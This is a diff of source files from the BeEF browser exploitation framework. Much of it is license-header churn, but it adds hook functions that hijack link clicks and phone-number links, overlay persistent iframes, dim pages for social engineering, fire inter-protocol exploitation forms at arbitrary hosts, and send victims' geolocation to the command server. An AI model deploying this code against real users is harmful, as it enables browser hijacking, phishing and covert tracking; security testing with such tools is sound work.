return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
end
end

16
core/filters/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/http.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/filters/page.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters

16
core/hbmanager.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module HBManager

15
core/loader.rb
View File

@@ -1,17 +1,8 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# @note Include here all the gems we are using
require 'rubygems'

52
core/main/client/are.js
View File

@@ -1,25 +1,47 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.are = {
init:function(){
var Jools = require('jools');
this.ruleEngine = new Jools();
},
rules:[],
send:function(module){
// there will probably be some other stuff here before things are finished
this.commands.push(module);
},
execute:function(inputs){
this.rulesEngine.execute(input);
},
cache_modules:function(modules){},
rules:[
{
'name':"exec_no_input",
'condition':function(command,browser){
//need to figure out how to handle the inputs
return (!command['inputs'] || command['inputs'].length == 0)
},
'consequence':function(command,browser){}
},
{
'name':"module_has_sibling",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
},
{
'name':"module_depends_on_module",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
}
],
commands:[],
results:[]
};
beef.regCmp("beef.are");
beef.regCmp("beef.are");

37
core/main/client/beef.js
View File

@@ -1,27 +1,16 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF JS Library <%= @beef_version %>
* http://beef.googlecode.com/
* Register the BeEF JS on the window object.
*/
$j = jQuery.noConflict();
//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
var BeefJS = {
@@ -42,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.

2894
core/main/client/browser.js
View File

File diff suppressed because it is too large Load Diff

209
core/main/client/browser/cookie.js
View File

@@ -1,110 +1,101 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.browser.cookie
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
*
*/
beef.browser.cookie = {
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
hasSessionCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
hasPersistentCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.browser.cookie
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
*
*/
beef.browser.cookie = {
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
hasSessionCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
hasPersistentCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
beef.regCmp('beef.browser.cookie');

67
core/main/client/browser/popup.js
View File

@@ -1,39 +1,30 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.browser.popup
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
*
*/
beef.browser.popup = {
blocker_enbabled: function ()
{
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.browser.popup
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
*
*/
beef.browser.popup = {
blocker_enabled: function ()
{
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
beef.regCmp('beef.browser.popup');

248
core/main/client/dom.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.dom
*
@@ -85,6 +76,30 @@ beef.dom = {
return iframe;
},
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -104,8 +119,15 @@ beef.dom = {
var form_action = params['src'];
params['src'] = '';
}
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action)
@@ -117,6 +139,94 @@ beef.dom = {
}
return iframe;
},
/**
* Load the link (href value) in an overlay foreground iFrame.
* The BeEF hook continues to run in background.
* NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
* Framebusting techniques, this will not work.
*/
persistentIframe: function(){
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -168,6 +278,23 @@ beef.dom = {
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param: {String} url: the url to be rewritten
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param: {String} old_protocol: the old link protocol to be rewritten
@@ -194,6 +321,31 @@ beef.dom = {
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param: {String} new_number: the new link telephone number to be written
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -232,7 +384,8 @@ beef.dom = {
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}else{
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {
@@ -240,7 +393,7 @@ beef.dom = {
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
@@ -259,24 +412,25 @@ beef.dom = {
}
content += "</applet>";
}
if (beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</embed>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
@@ -315,6 +469,30 @@ beef.dom = {
formXsrf.submit();
return iframeXsrf;
},
/**
* Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
* @params: {String} rhost: remote host ip/domain
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
input = document.createElement('textarea');
input.setAttribute('name', Math.random().toString(36).substring(5));
input.value = commands;
formIpec.appendChild(input);
iframeIpec.contentWindow.document.body.appendChild(formIpec);
formIpec.submit();
return iframeIpec;
}
};

17
core/main/client/encode/base64.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
beef.encode = {};

17
core/main/client/encode/json.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
beef.encode.json = {

27
core/main/client/geolocation.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.geolocation
*
@@ -41,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -73,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:

138
core/main/client/hardware.js
View File

@@ -1,54 +1,57 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.hardware = {
ua: navigator.userAgent,
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
},
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
isVirtualMachine: function() {
if (screen.width % 2 || screen.height % 2) return true;
return false;
},
isLaptop: function() {
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
isKindle: function() {
return (this.ua.match('Kindle')) ? true : false;
},
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
@@ -57,10 +60,6 @@ beef.hardware = {
return (this.ua.match('Ericsson')) ? true : false;
},
isNokia: function() {
return (this.ua.match('Nokia')) ? true : false;
},
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
@@ -69,23 +68,62 @@ beef.hardware = {
return (this.ua.match('Nexus One')) ? true : false;
},
getName: function() {
/**
* Returns true if the browser is on a Mobile Phone
* @return: {Boolean} true or false
*
* @example: if(beef.hardware.isMobilePhone()) { ... }
**/
isMobilePhone: function() {
return DetectMobileQuick();
},
if (this.isNokia()) return 'Nokia';
if (this.isWinPhone()) return 'Windows Phone';
if (this.isBlackBerry()) return 'BlackBerry';
if (this.isIphone()) return 'iPhone';
if (this.isIpad()) return 'iPad';
if (this.isIpod()) return 'iPod';
if (this.isKindle()) return 'Kindle';
if (this.isHtc()) return 'HTC';
if (this.isMotorola()) return 'Motorola';
if (this.isZune()) return 'Zune';
if (this.isGoogle()) return 'Google';
if (this.isEricsson()) return 'Ericsson';
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(DetectIphone()) { return "iPhone"};
if(DetectIpod()) { return "iPod Touch"};
if(DetectIpad()) { return "iPad"};
if (this.isHtc()) { return 'HTC'};
if (this.isMotorola()) { return 'Motorola'};
if (this.isZune()) { return 'Zune'};
if (this.isGoogle()) { return 'Google Nexus One'};
if (this.isEricsson()) { return 'Ericsson'};
if(DetectAndroidPhone()) { return "Android Phone"};
if(DetectAndroidTablet()) { return "Android Tablet"};
if(DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
if(ua.search(deviceS60) > -1) { return "Nokia S60"};
if(ua.search(deviceS70) > -1) { return "Nokia S70"};
if(ua.search(deviceS80) > -1) { return "Nokia S80"};
